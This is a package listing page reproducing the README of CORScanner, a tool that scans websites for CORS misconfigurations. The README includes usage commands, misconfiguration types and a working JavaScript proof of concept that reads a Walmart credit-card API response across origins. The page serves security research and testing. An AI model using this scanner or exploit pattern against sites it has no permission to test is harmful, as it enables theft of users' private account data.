Huge News!Announcing our $40M Series B led by Abstract Ventures.Learn More
Socket
Sign inDemoInstall
Socket

cors

Package Overview
Dependencies
Maintainers
1
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

cors

Fast CORS misconfiguration vulnerabilities scanner

  • 1.0.1
  • Source
  • PyPI
  • Socket score

Maintainers
1

About CORScanner

CORScanner is a python tool designed to discover CORS misconfigurations vulnerabilities of websites. It helps website administrators and penetration testers to check whether the domains/urls they are targeting have insecure CORS policies.

Features

  • Fast. It uses gevent instead of Python threads for concurrency, which is much faster for network scanning.
  • Comprehensive. It covers all the common types of CORS misconfigurations we know.
  • Flexible. It supports various self-define features (e.g. file output), which is helpful for large-scale scanning.
  • 🆕 CORScanner supports installation via pip (pip install corscanner or pip install cors)
  • 🆕 CORScanner can be used as a library in your project.

Two useful references for understanding CORS systematically:

Please consider citing our paper if you do scentific research (Click me).

Latex version:

@inproceedings{chen-cors,
author = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang},
title = {We Still Don{\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}},
booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},
year = {2018},
isbn = {978-1-939133-04-5},
address = {Baltimore, MD},
pages = {1079--1093},
url = {https://www.usenix.org/conference/usenixsecurity18/presentation/chen-jianjun},
publisher = {{USENIX} Association},
month = aug,
}

Word version:

Jianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. "We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS." In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 2018.

Screenshots

CORScanner

Installation

  • Download this tool
git clone https://github.com/chenjj/CORScanner.git
  • Install dependencies
sudo pip install -r requirements.txt

CORScanner depends on the requests, gevent, tldextract, colorama and argparse python modules.

Python Version:

  • Both Python 2 (2.7.x) and Python 3 (3.7.x) are supported.

CORScanner as a library

  • Install CORScanner via pip
sudo pip install corscanner

or use the short name:

sudo pip install cors
  • Example code:
>>> from CORScanner.cors_scan import cors_check
>>> ret = cors_check("https://www.instagram.com", None)
>>> ret
{'url': 'https://www.instagram.com', 'type': 'reflect_origin', 'credentials': 'false', 'origin': 'https://evil.com', 'status_code': 200}

You can also use CORScanner via the corscanner or cors command: corscanner -vu https://www.instagram.com

Usage

Short FormLong FormDescription
-u--urlURL/domain to check it's CORS policy
-d--headersAdd headers to the request
-i--inputURL/domain list file to check their CORS policy
-t--threadsNumber of threads to use for CORS scan
-o--outputSave the results to json file
-v--verboseEnable the verbose mode and display results in realtime
-T--timeoutSet requests timeout (default 10 sec)
-p--proxyEnable proxy (http or socks5)
-h--helpshow the help message and exit

Examples

  • To check CORS misconfigurations of specific domain:

python cors_scan.py -u example.com

  • To enable more debug info, use -v:

python cors_scan.py -u example.com -v

  • To save scan results to a JSON file, use -o:

python cors_scan.py -u example.com -o output_filename

  • To check CORS misconfigurations of specific URL:

python cors_scan.py -u http://example.com/restapi

  • To check CORS misconfiguration with specific headers:

python cors_scan.py -u example.com -d "Cookie: test"

  • To check CORS misconfigurations of multiple domains/URLs:

python cors_scan.py -i top_100_domains.txt -t 100

  • To enable proxy for CORScanner, use -p

python cors_scan.py -u example.com -p http://127.0.0.1:8080

To use socks5 proxy, install PySocks with pip install PySocks

python cors_scan.py -u example.com -p socks5://127.0.0.1:8080

  • To list all the basic options and switches use -h switch:

python cors_scan.py -h

Misconfiguration types

This tool covers the following misconfiguration types:

Misconfiguration typeDescription
Reflect_any_originBlindly reflect the Origin header value in Access-Control-Allow-Origin headers in responses, which means any website can read its secrets by sending cross-orign requests.
Prefix_matchwwww.example.com trusts example.com.evil.com, which is an attacker's domain.
Suffix_matchwwww.example.com trusts evilexample.com, which could be registered by an attacker.
Not_escape_dotwwww.example.com trusts wwwaexample.com, which could be registered by an attacker.
Substring matchwwww.example.com trusts example.co, which could be registered by an attacker.
Trust_nullwwww.example.com trusts null, which can be forged by iframe sandbox scripts
HTTPS_trust_HTTPRisky trust dependency, a MITM attacker may steal HTTPS site secrets
Trust_any_subdomainRisky trust dependency, a subdomain XSS may steal its secrets
Custom_third_partiesCustom unsafe third parties origins like github.io, see more in origins.json file. Thanks @phackt!
Special_characters_bypassExploiting browsers’ handling of special characters. Most can only work in Safari except _, which can also work in Chrome and Firefox. See more in Advanced CORS Exploitation Techniques. Thanks @Malayke.

Welcome to contribute more.

Exploitation examples

Here is an example about how to exploit "Reflect_any_origin" misconfiguration on Walmart.com(fixed). Localhost is the malicious website in the video.

Walmart.com video on Youtube:

Walmart_CORS_misconfiguration_exploitation

Here is the exploitation code:

<script>
    // Send a cross origin request to the walmart.com server, when a victim visits the page.
    var req = new XMLHttpRequest();
    req.open('GET',"https://www.walmart.com/account/electrode/account/api/customer/:CID/credit-card",true);
    req.onload = stealData;
    req.withCredentials = true;
    req.send();

    function stealData(){
        //reading response is allowed because of the CORS misconfiguration.
        var data= JSON.stringify(JSON.parse(this.responseText),null,2);

        //display the data on the page. A real attacker can send the data to his server.
        output(data);
    }

    function output(inp) {
        document.body.appendChild(document.createElement('pre')).innerHTML = inp;
    }
</script>

If you have understood how the demo works, you can read Section 5 and Section 6 of the CORS paper and know how to exploit other misconfigurations.

License

CORScanner is licensed under the MIT license. take a look at the LICENSE for more information.

Credits

This work is inspired by the following excellent researches:

  • James Kettle, “Exploiting CORS misconfigurations for Bitcoins and bounties”, AppSecUSA 2016*
  • Evan Johnson, “Misconfigured CORS and why web appsec is not getting easier”, AppSecUSA 2016*
  • Von Jens Müller, "CORS misconfigurations on a large scale", CORStest*

FAQs


Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc